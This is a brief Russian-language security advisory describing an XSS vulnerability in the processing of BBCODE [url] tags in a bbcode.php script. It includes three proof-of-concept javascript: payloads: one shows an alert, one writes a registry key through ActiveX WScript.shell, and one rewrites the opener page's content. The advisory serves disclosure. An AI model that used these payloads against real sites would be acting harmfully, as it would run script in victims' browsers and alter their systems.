Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with «CouCou»[/url]
[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou
%22);window.close();]Create registry entry:
HKCUQQQQQqq = «CouCou»[/url]
[url=javascript://%0Awindow.opener.document.body.
innerHTML=window.opener.document.body.innerHTML.
replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();]Modify opener page: Paul -> P.A.U.L[/url]
